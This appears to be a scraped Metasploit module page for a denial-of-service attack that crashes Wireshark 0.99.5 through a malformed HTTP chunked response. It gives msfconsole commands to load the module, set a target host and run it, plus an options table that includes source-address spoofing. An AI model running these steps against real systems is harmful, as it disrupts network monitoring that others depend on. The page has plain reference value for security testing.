Wireshark chunked_encoding_dissector function DOS
Wireshark crash when dissecting an HTTP chunked response. Versions affected: 0.99.5 (Bug 1394)
Rank
- Normal
Authors
- Matteo Cantoni < goony [at] nothink.org >
Vulnerability References
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/wireshark/chunked
msf auxiliary(chunked) > set RHOST [TARGET IP]
msf auxiliary(chunked) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/wireshark/chunked
msf auxiliary(chunked) > set RHOST [TARGET IP]
msf auxiliary(chunked) > run
Module Options
| INTERFACE | The name of the interface |
| RHOST | The target address |
| SHOST | This option can be used to specify a spoofed source address |
| SNAPLEN | The number of bytes to capture (default: 65535) |
| SPORT | The source port used to send the malicious HTTP response (default: 80) |
| TIMEOUT | The number of seconds to wait for new data (default: 500) |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |